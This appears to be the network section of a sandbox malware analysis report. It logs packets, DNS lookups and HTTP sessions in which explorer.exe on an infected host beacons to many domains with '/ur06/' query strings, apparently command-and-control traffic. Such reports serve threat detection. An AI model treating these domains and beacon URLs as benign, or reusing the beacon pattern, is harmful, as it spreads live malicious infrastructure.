Jan 13, 2021 21:40:50.541443110 CET	49775	80	192.168.2.4	219.94.203.152
Jan 13, 2021 21:40:50.852966070 CET	80	49775	219.94.203.152	192.168.2.4
Jan 13, 2021 21:40:50.922324896 CET	80	49775	219.94.203.152	192.168.2.4
Jan 13, 2021 21:40:50.922343016 CET	80	49775	219.94.203.152	192.168.2.4
Jan 13, 2021 21:40:50.922624111 CET	49775	80	192.168.2.4	219.94.203.152
Jan 13, 2021 21:40:50.922776937 CET	49775	80	192.168.2.4	219.94.203.152
Jan 13, 2021 21:40:51.233577013 CET	80	49775	219.94.203.152	192.168.2.4
Jan 13, 2021 21:40:56.005146027 CET	49776	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:56.045151949 CET	80	49776	34.102.136.180	192.168.2.4
Jan 13, 2021 21:40:56.048319101 CET	49776	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:56.048911095 CET	49776	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:56.088887930 CET	80	49776	34.102.136.180	192.168.2.4
Jan 13, 2021 21:40:56.187163115 CET	80	49776	34.102.136.180	192.168.2.4
Jan 13, 2021 21:40:56.187185049 CET	80	49776	34.102.136.180	192.168.2.4
Jan 13, 2021 21:40:56.187419891 CET	49776	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:56.187513113 CET	49776	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:40:56.229310989 CET	80	49776	34.102.136.180	192.168.2.4
Jan 13, 2021 21:41:06.535482883 CET	49777	80	192.168.2.4	192.185.0.218
Jan 13, 2021 21:41:06.693619013 CET	80	49777	192.185.0.218	192.168.2.4
Jan 13, 2021 21:41:06.696706057 CET	49777	80	192.168.2.4	192.185.0.218
Jan 13, 2021 21:41:06.700105906 CET	49777	80	192.168.2.4	192.185.0.218
Jan 13, 2021 21:41:06.857822895 CET	80	49777	192.185.0.218	192.168.2.4
Jan 13, 2021 21:41:06.857851028 CET	80	49777	192.185.0.218	192.168.2.4
Jan 13, 2021 21:41:06.857861042 CET	80	49777	192.185.0.218	192.168.2.4
Jan 13, 2021 21:41:06.858290911 CET	49777	80	192.168.2.4	192.185.0.218
Jan 13, 2021 21:41:06.858450890 CET	49777	80	192.168.2.4	192.185.0.218
Jan 13, 2021 21:41:07.017548084 CET	80	49777	192.185.0.218	192.168.2.4
Jan 13, 2021 21:41:12.042943001 CET	49778	80	192.168.2.4	67.205.105.239
Jan 13, 2021 21:41:15.059544086 CET	49778	80	192.168.2.4	67.205.105.239
Jan 13, 2021 21:41:21.060072899 CET	49778	80	192.168.2.4	67.205.105.239
Jan 13, 2021 21:41:37.400444031 CET	49779	80	192.168.2.4	67.205.105.239
Jan 13, 2021 21:41:38.366517067 CET	49780	80	192.168.2.4	198.54.117.244
Jan 13, 2021 21:41:38.559370995 CET	80	49780	198.54.117.244	192.168.2.4
Jan 13, 2021 21:41:38.560218096 CET	49780	80	192.168.2.4	198.54.117.244
Jan 13, 2021 21:41:38.560393095 CET	49780	80	192.168.2.4	198.54.117.244
Jan 13, 2021 21:41:38.753252983 CET	80	49780	198.54.117.244	192.168.2.4
Jan 13, 2021 21:41:38.753289938 CET	80	49780	198.54.117.244	192.168.2.4
Jan 13, 2021 21:41:40.405427933 CET	49779	80	192.168.2.4	67.205.105.239
Jan 13, 2021 21:41:43.831842899 CET	49781	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:41:43.871917009 CET	80	49781	34.102.136.180	192.168.2.4
Jan 13, 2021 21:41:43.872281075 CET	49781	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:41:43.872421026 CET	49781	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:41:43.912395954 CET	80	49781	34.102.136.180	192.168.2.4
Jan 13, 2021 21:41:44.011373997 CET	80	49781	34.102.136.180	192.168.2.4
Jan 13, 2021 21:41:44.012023926 CET	80	49781	34.102.136.180	192.168.2.4
Jan 13, 2021 21:41:44.012119055 CET	49781	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:41:44.012223959 CET	49781	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:41:44.052416086 CET	80	49781	34.102.136.180	192.168.2.4
Jan 13, 2021 21:41:46.405911922 CET	49779	80	192.168.2.4	67.205.105.239
Jan 13, 2021 21:41:49.016307116 CET	49782	80	192.168.2.4	52.116.52.25
Jan 13, 2021 21:41:49.174526930 CET	80	49782	52.116.52.25	192.168.2.4
Jan 13, 2021 21:41:49.176887989 CET	49782	80	192.168.2.4	52.116.52.25
Jan 13, 2021 21:41:49.177076101 CET	49782	80	192.168.2.4	52.116.52.25
Jan 13, 2021 21:41:49.335052013 CET	80	49782	52.116.52.25	192.168.2.4
Jan 13, 2021 21:41:49.335088968 CET	80	49782	52.116.52.25	192.168.2.4
Jan 13, 2021 21:41:49.335114002 CET	80	49782	52.116.52.25	192.168.2.4
Jan 13, 2021 21:41:49.335359097 CET	49782	80	192.168.2.4	52.116.52.25
Jan 13, 2021 21:41:49.335458040 CET	49782	80	192.168.2.4	52.116.52.25
Jan 13, 2021 21:41:49.493416071 CET	80	49782	52.116.52.25	192.168.2.4
Jan 13, 2021 21:41:54.344758987 CET	49783	80	192.168.2.4	104.18.45.60
Jan 13, 2021 21:41:54.395450115 CET	80	49783	104.18.45.60	192.168.2.4
Jan 13, 2021 21:41:54.395559072 CET	49783	80	192.168.2.4	104.18.45.60
Jan 13, 2021 21:41:54.395767927 CET	49783	80	192.168.2.4	104.18.45.60
Jan 13, 2021 21:41:54.446261883 CET	80	49783	104.18.45.60	192.168.2.4
Jan 13, 2021 21:41:54.788088083 CET	80	49783	104.18.45.60	192.168.2.4
Jan 13, 2021 21:41:54.788104057 CET	80	49783	104.18.45.60	192.168.2.4
Jan 13, 2021 21:41:54.788320065 CET	49783	80	192.168.2.4	104.18.45.60
Jan 13, 2021 21:41:54.788391113 CET	49783	80	192.168.2.4	104.18.45.60
Jan 13, 2021 21:41:54.788599014 CET	80	49783	104.18.45.60	192.168.2.4
Jan 13, 2021 21:41:54.788850069 CET	49783	80	192.168.2.4	104.18.45.60
Jan 13, 2021 21:41:59.798398972 CET	49784	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:41:59.839173079 CET	80	49784	34.102.136.180	192.168.2.4
Jan 13, 2021 21:41:59.840307951 CET	49784	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:41:59.841177940 CET	49784	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:41:59.881376028 CET	80	49784	34.102.136.180	192.168.2.4
Jan 13, 2021 21:41:59.979943991 CET	80	49784	34.102.136.180	192.168.2.4
Jan 13, 2021 21:41:59.979989052 CET	80	49784	34.102.136.180	192.168.2.4
Jan 13, 2021 21:41:59.980706930 CET	49784	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:41:59.980787992 CET	49784	80	192.168.2.4	34.102.136.180
Jan 13, 2021 21:42:00.020922899 CET	80	49784	34.102.136.180	192.168.2.4
Jan 13, 2021 21:42:04.986809015 CET	49785	80	192.168.2.4	66.96.147.112
Jan 13, 2021 21:42:05.113414049 CET	80	49785	66.96.147.112	192.168.2.4
Jan 13, 2021 21:42:05.113950014 CET	49785	80	192.168.2.4	66.96.147.112
Jan 13, 2021 21:42:05.114039898 CET	49785	80	192.168.2.4	66.96.147.112
Jan 13, 2021 21:42:05.240457058 CET	80	49785	66.96.147.112	192.168.2.4
Jan 13, 2021 21:42:05.247495890 CET	80	49785	66.96.147.112	192.168.2.4
Jan 13, 2021 21:42:05.247524023 CET	80	49785	66.96.147.112	192.168.2.4
Jan 13, 2021 21:42:05.248619080 CET	49785	80	192.168.2.4	66.96.147.112
Jan 13, 2021 21:42:05.248778105 CET	49785	80	192.168.2.4	66.96.147.112
Jan 13, 2021 21:42:05.375233889 CET	80	49785	66.96.147.112	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 21:39:03.769582033 CET	64549	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:03.817517996 CET	53	64549	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:04.687351942 CET	63153	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:04.737185001 CET	53	63153	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:08.918391943 CET	52991	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:08.966140032 CET	53	52991	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:10.078830004 CET	53700	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:10.126689911 CET	53	53700	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:10.883361101 CET	51726	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:10.931302071 CET	53	51726	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:11.792531013 CET	56794	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:11.840539932 CET	53	56794	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:13.050211906 CET	56534	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:13.098164082 CET	53	56534	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:13.837110996 CET	56627	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:13.888046980 CET	53	56627	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:14.646430969 CET	56621	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:14.697665930 CET	53	56621	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:15.817425013 CET	63116	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:15.866247892 CET	53	63116	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:17.008371115 CET	64078	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:17.059150934 CET	53	64078	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:30.234755039 CET	64801	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:30.282686949 CET	53	64801	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:35.357418060 CET	61721	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:35.415160894 CET	53	61721	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:51.866336107 CET	51255	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:51.917222023 CET	53	51255	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:55.072583914 CET	61522	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:55.123357058 CET	53	61522	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:56.169661999 CET	52337	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:56.217612982 CET	53	52337	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:56.834964991 CET	55046	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:56.882890940 CET	53	55046	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:57.297414064 CET	49612	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:57.353503942 CET	53	49612	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:57.726777077 CET	49285	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:57.791210890 CET	53	49285	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:57.827044010 CET	50601	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:57.886919022 CET	53	50601	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:58.426337957 CET	60875	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:58.485651970 CET	53	60875	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:59.031951904 CET	56448	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:59.088660002 CET	53	56448	8.8.8.8	192.168.2.4
Jan 13, 2021 21:39:59.816644907 CET	59172	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:39:59.867450953 CET	53	59172	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:01.356472969 CET	62420	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:01.423151970 CET	53	62420	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:01.541433096 CET	60579	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:01.597776890 CET	53	60579	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:02.943430901 CET	50183	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:03.000041962 CET	53	50183	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:06.760885954 CET	61531	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:06.836218119 CET	53	61531	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:08.267771006 CET	49228	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:08.326929092 CET	53	49228	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:12.326385975 CET	59794	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:12.393527031 CET	53	59794	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:15.465415001 CET	55916	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:15.513267994 CET	53	55916	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:17.996078014 CET	52752	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:18.143990993 CET	53	52752	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:23.419203997 CET	60542	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:23.496516943 CET	53	60542	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:28.514401913 CET	60689	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:28.576649904 CET	53	60689	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:33.897445917 CET	64206	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:33.970165014 CET	53	64206	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:39.076437950 CET	50904	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:39.113449097 CET	57525	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:39.161427975 CET	53	57525	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:39.167140961 CET	53	50904	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:44.826822996 CET	53814	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:44.894416094 CET	53	53814	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:49.927184105 CET	53418	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:50.228456974 CET	53	53418	8.8.8.8	192.168.2.4
Jan 13, 2021 21:40:55.942719936 CET	62833	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:40:56.002938032 CET	53	62833	8.8.8.8	192.168.2.4
Jan 13, 2021 21:41:06.247328997 CET	59260	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:41:06.533694983 CET	53	59260	8.8.8.8	192.168.2.4
Jan 13, 2021 21:41:11.887011051 CET	49944	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:41:12.040739059 CET	53	49944	8.8.8.8	192.168.2.4
Jan 13, 2021 21:41:37.266710997 CET	63300	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:41:37.322856903 CET	53	63300	8.8.8.8	192.168.2.4
Jan 13, 2021 21:41:38.135998011 CET	61449	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:41:38.364562988 CET	53	61449	8.8.8.8	192.168.2.4
Jan 13, 2021 21:41:43.769854069 CET	51275	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:41:43.830523014 CET	53	51275	8.8.8.8	192.168.2.4
Jan 13, 2021 21:42:10.255633116 CET	63492	53	192.168.2.4	8.8.8.8
Jan 13, 2021 21:42:10.354531050 CET	53	63492	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2021 21:40:01.356472969 CET	192.168.2.4	8.8.8.8	0xcf09	Standard query (0)	www.bimetalthermostatksd.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:06.760885954 CET	192.168.2.4	8.8.8.8	0x8e2d	Standard query (0)	www.straightlineautoserviceerie.net	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:12.326385975 CET	192.168.2.4	8.8.8.8	0x78bb	Standard query (0)	www.cmoorestudio.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:15.465415001 CET	192.168.2.4	8.8.8.8	0x756f	Standard query (0)	g.msn.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:17.996078014 CET	192.168.2.4	8.8.8.8	0xb270	Standard query (0)	www.eldritchparadox.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:23.419203997 CET	192.168.2.4	8.8.8.8	0x6e0d	Standard query (0)	www.nipseythegreat.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:28.514401913 CET	192.168.2.4	8.8.8.8	0x51fb	Standard query (0)	www.maconanimalexterminator.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:33.897445917 CET	192.168.2.4	8.8.8.8	0xa2d3	Standard query (0)	www.pelisplusxd.net	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:39.076437950 CET	192.168.2.4	8.8.8.8	0xfb5a	Standard query (0)	www.allismd.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:44.826822996 CET	192.168.2.4	8.8.8.8	0x106	Standard query (0)	www.qoo10online.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:49.927184105 CET	192.168.2.4	8.8.8.8	0xe769	Standard query (0)	www.central-car-sales.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:55.942719936 CET	192.168.2.4	8.8.8.8	0x45d7	Standard query (0)	www.nolarapper.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:41:06.247328997 CET	192.168.2.4	8.8.8.8	0xc240	Standard query (0)	www.promanconsortium.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:41:11.887011051 CET	192.168.2.4	8.8.8.8	0x87e8	Standard query (0)	www.animaliaartist.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:41:37.266710997 CET	192.168.2.4	8.8.8.8	0x3889	Standard query (0)	www.animaliaartist.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:41:38.135998011 CET	192.168.2.4	8.8.8.8	0x337e	Standard query (0)	www.profille-sarina23tammara.club	A (IP address)	IN (0x0001)
Jan 13, 2021 21:41:43.769854069 CET	192.168.2.4	8.8.8.8	0xd6f9	Standard query (0)	www.restaurantsilhouette.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:42:10.255633116 CET	192.168.2.4	8.8.8.8	0x6234	Standard query (0)	www.nipseythegreat.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 21:40:01.423151970 CET	8.8.8.8	192.168.2.4	0xcf09	No error (0)	www.bimetalthermostatksd.com		52.116.52.25	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:06.836218119 CET	8.8.8.8	192.168.2.4	0x8e2d	No error (0)	www.straightlineautoserviceerie.net		104.18.45.60	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:06.836218119 CET	8.8.8.8	192.168.2.4	0x8e2d	No error (0)	www.straightlineautoserviceerie.net		104.18.44.60	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:06.836218119 CET	8.8.8.8	192.168.2.4	0x8e2d	No error (0)	www.straightlineautoserviceerie.net		172.67.210.21	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:12.393527031 CET	8.8.8.8	192.168.2.4	0x78bb	No error (0)	www.cmoorestudio.com	cmoorestudio.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:40:12.393527031 CET	8.8.8.8	192.168.2.4	0x78bb	No error (0)	cmoorestudio.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:15.513267994 CET	8.8.8.8	192.168.2.4	0x756f	No error (0)	g.msn.com	g-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:40:18.143990993 CET	8.8.8.8	192.168.2.4	0xb270	No error (0)	www.eldritchparadox.com		66.96.147.112	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:23.496516943 CET	8.8.8.8	192.168.2.4	0x6e0d	Name error (3)	www.nipseythegreat.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:28.576649904 CET	8.8.8.8	192.168.2.4	0x51fb	No error (0)	www.maconanimalexterminator.com	maconanimalexterminator.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:40:28.576649904 CET	8.8.8.8	192.168.2.4	0x51fb	No error (0)	maconanimalexterminator.com		107.180.50.162	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:33.970165014 CET	8.8.8.8	192.168.2.4	0xa2d3	No error (0)	www.pelisplusxd.net		104.21.26.55	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:33.970165014 CET	8.8.8.8	192.168.2.4	0xa2d3	No error (0)	www.pelisplusxd.net		172.67.135.124	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:39.167140961 CET	8.8.8.8	192.168.2.4	0xfb5a	No error (0)	www.allismd.com	allismd.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:40:39.167140961 CET	8.8.8.8	192.168.2.4	0xfb5a	No error (0)	allismd.com		5.181.218.55	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:44.894416094 CET	8.8.8.8	192.168.2.4	0x106	Name error (3)	www.qoo10online.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:50.228456974 CET	8.8.8.8	192.168.2.4	0xe769	No error (0)	www.central-car-sales.com		219.94.203.152	A (IP address)	IN (0x0001)
Jan 13, 2021 21:40:56.002938032 CET	8.8.8.8	192.168.2.4	0x45d7	No error (0)	www.nolarapper.com	nolarapper.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:40:56.002938032 CET	8.8.8.8	192.168.2.4	0x45d7	No error (0)	nolarapper.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 13, 2021 21:41:06.533694983 CET	8.8.8.8	192.168.2.4	0xc240	No error (0)	www.promanconsortium.com		192.185.0.218	A (IP address)	IN (0x0001)
Jan 13, 2021 21:41:12.040739059 CET	8.8.8.8	192.168.2.4	0x87e8	No error (0)	www.animaliaartist.com	animaliaartist.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:41:12.040739059 CET	8.8.8.8	192.168.2.4	0x87e8	No error (0)	animaliaartist.com		67.205.105.239	A (IP address)	IN (0x0001)
Jan 13, 2021 21:41:37.322856903 CET	8.8.8.8	192.168.2.4	0x3889	No error (0)	www.animaliaartist.com	animaliaartist.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:41:37.322856903 CET	8.8.8.8	192.168.2.4	0x3889	No error (0)	animaliaartist.com		67.205.105.239	A (IP address)	IN (0x0001)
Jan 13, 2021 21:41:38.364562988 CET	8.8.8.8	192.168.2.4	0x337e	No error (0)	www.profille-sarina23tammara.club		198.54.117.244	A (IP address)	IN (0x0001)
Jan 13, 2021 21:41:43.830523014 CET	8.8.8.8	192.168.2.4	0xd6f9	No error (0)	www.restaurantsilhouette.com	restaurantsilhouette.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:41:43.830523014 CET	8.8.8.8	192.168.2.4	0xd6f9	No error (0)	restaurantsilhouette.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 13, 2021 21:42:10.354531050 CET	8.8.8.8	192.168.2.4	0x6234	Name error (3)	www.nipseythegreat.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.bimetalthermostatksd.com

www.straightlineautoserviceerie.net

www.cmoorestudio.com

www.eldritchparadox.com

www.maconanimalexterminator.com

www.pelisplusxd.net

www.allismd.com

www.central-car-sales.com

www.nolarapper.com

www.promanconsortium.com

www.profille-sarina23tammara.club

www.restaurantsilhouette.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49759	52.116.52.25	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:40:01.588515997 CET	1203	OUT	GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1 Host: www.bimetalthermostatksd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:40:01.747785091 CET	1211	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 13 Jan 2021 20:40:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: https://www.bimetalthermostatksd.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 X-Cache-CFC: - Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49762	104.18.45.60	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:40:06.887569904 CET	1331	OUT	GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1 Host: www.straightlineautoserviceerie.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:40:07.314032078 CET	1332	IN	HTTP/1.1 403 forbidden Date: Wed, 13 Jan 2021 20:40:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Set-Cookie: __cfduid=dd0f9a9aa8e253d8c19b87cf8fff517111610570406; expires=Fri, 12-Feb-21 20:40:06 GMT; path=/; domain=.straightlineautoserviceerie.net; HttpOnly; SameSite=Lax Vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 079f13340d000041075f803000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Fbhd0pgrK43lX9YqfuIqQZxthUNI6EY439v6Jfr8mjdryX8RBjEmP6KaG2XY2dAA1XLq6kfIdLTZLqVVJ78JYS5DXI68UiE4%2B4ziBG61wvNitggk9pFgSocgHDWzgkru4%2B3IjQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6111ee3348824107-PRG Data Raw: 64 0d 0a 34 30 33 20 46 4f 52 42 49 44 44 45 4e 0d 0a Data Ascii: d403 FORBIDDEN
Jan 13, 2021 21:40:07.314054966 CET	1332	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49780	198.54.117.244	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:41:38.560393095 CET	5709	OUT	GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf HTTP/1.1 Host: www.profille-sarina23tammara.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49781	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:41:43.872421026 CET	5710	OUT	GET /ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLG HTTP/1.1 Host: www.restaurantsilhouette.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
